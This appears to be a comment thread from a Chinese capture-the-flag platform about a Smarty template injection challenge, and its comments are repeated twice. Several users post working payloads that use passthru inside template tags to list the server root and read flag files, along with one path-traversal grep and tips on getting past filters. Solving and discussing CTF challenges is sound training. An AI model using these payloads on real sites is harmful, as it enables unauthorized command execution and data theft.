/?w={{passthru("ls /")}} /?w={{passthru("more /_数字文件名")}}
passthru执行函数查看(ls),然后再查看列出的数字文件
index.php?a={{passthru('more ../../../*|grep ff')}}
{lf passthru("tac /_*")}{/if}
哪位大神告诉我为什么{var_dump(`ls`)}不行
https://blog.csdn.net/m_de_g/article/details/120380488
?xxx={if passthru("less /_21752 ")}{/if}
大佬们 你们都是怎么发现是什么模块注入的?TAT我好菜啊~~
随便传了个参数,就回显了php代码
小猿搜题
奇怪,tac不行,tail等可以。
smarty模板注入 看正则过滤内容 在最后查看flag的时候可以试试sort工具
...
评论
s1amese 11月前
举报
/?w={{passthru("ls /")}} /?w={{passthru("more /_数字文件名")}}
s1amese 11月前
举报
passthru执行函数查看(ls),然后再查看列出的数字文件
gleason 1年前
举报
index.php?a={{passthru('more ../../../*|grep ff')}}
Whittebz 1年前
举报
{lf passthru("tac /_*")}{/if}
Vio1et 1年前
举报
哪位大神告诉我为什么{var_dump(`ls`)}不行
zdfy005 1年前
举报
https://blog.csdn.net/m_de_g/article/details/120380488
aWxvdmVjdGY 1年前
举报
?xxx={if passthru("less /_21752 ")}{/if}
笨笨笨蛋 1年前
举报
大佬们 你们都是怎么发现是什么模块注入的?TAT我好菜啊~~
kaikaixinxin 10月前
举报
随便传了个参数,就回显了php代码
websterchan 1年前
举报
小猿搜题
lysandria 1年前
举报
奇怪,tac不行,tail等可以。
miko 2年前
举报
smarty模板注入 看正则过滤内容 在最后查看flag的时候可以试试sort工具